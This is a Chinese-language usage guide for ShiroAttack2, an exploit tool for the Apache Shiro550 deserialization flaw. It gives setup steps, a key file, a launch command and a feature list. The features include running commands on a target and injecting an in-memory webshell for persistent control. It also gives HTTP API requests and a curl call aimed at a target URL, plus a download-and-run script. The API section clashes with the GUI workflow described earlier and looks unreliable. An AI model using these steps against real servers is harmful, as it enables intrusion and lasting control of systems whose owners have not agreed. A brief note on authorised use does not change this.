【亲测免费】 ShiroAttack2 技术文档

1. 安装指南

1.1 环境要求

• Java 8 或更高版本
• 确保系统已安装Java运行环境（JRE）

1.2 下载与安装

1. 访问 ShiroAttack2 GitHub 仓库。
2. 在仓库页面中，找到并下载最新版本的 shiro_attack-{version}-SNAPSHOT-all.jar 文件。
3. 将下载的 .jar 文件放置在您希望安装的目录中。

1.3 配置文件

在 .jar 文件的当前目录下创建一个名为 data 的文件夹，并在其中创建一个名为 shiro_keys.txt 的文件。shiro_keys.txt 文件内容应包含您要使用的 Shiro key。

2. 项目的使用说明

2.1 启动工具

1. 打开命令行终端，导航到 .jar 文件所在的目录。
2. 运行以下命令启动工具：

   java -jar shiro_attack-{version}-SNAPSHOT-all.jar
   

2.2 功能概述

• 回显执行命令：支持直接在目标系统上执行命令并回显结果。
• 内存马注入：支持向目标系统注入内存马，实现持久化控制。
• 多版本支持：支持多个版本的 CommonsBeanutils gadget。
• 自定义请求头：允许用户自定义请求头，格式为 abc:123&&&test:123。

2.3 使用示例

1. 启动工具后，根据界面提示输入目标URL和Shiro key。
2. 选择要执行的操作，如命令执行或内存马注入。
3. 根据提示完成操作，查看结果。

3. 项目API使用文档

3.1 API概述

ShiroAttack2 提供了一些API接口，用于自动化漏洞利用。以下是一些常用的API接口：

• 命令执行API：

  POST /executeCommand
  Content-Type: application/json
  
  {
    "url": "http://target.com",
    "command": "ls -la"
  }
  

• 内存马注入API：

  POST /injectMemShell
  Content-Type: application/json
  
  {
    "url": "http://target.com",
    "payload": "base64_encoded_payload"
  }
  

3.2 API调用示例

使用 curl 命令调用命令执行API：

curl -X POST http://localhost:8080/executeCommand -H "Content-Type: application/json" -d '{"url": "http://target.com", "command": "ls -la"}'

4. 项目安装方式

4.1 手动安装

1. 下载 .jar 文件。
2. 创建 data 文件夹和 shiro_keys.txt 文件。
3. 运行 .jar 文件。

4.2 自动化安装

可以使用脚本自动化安装过程：

#!/bin/bash

# 下载最新版本的 ShiroAttack2
wget https://github.com/SummerSec/ShiroAttack2/releases/latest/download/shiro_attack-{version}-SNAPSHOT-all.jar

# 创建 data 文件夹和 shiro_keys.txt 文件
mkdir data
echo "your_shiro_key" > data/shiro_keys.txt

# 运行工具
java -jar shiro_attack-{version}-SNAPSHOT-all.jar

---

通过以上步骤，您可以顺利安装并使用 ShiroAttack2 工具进行 Shiro550 漏洞的快速利用。请确保在合法和授权的环境中使用该工具，遵守相关法律法规。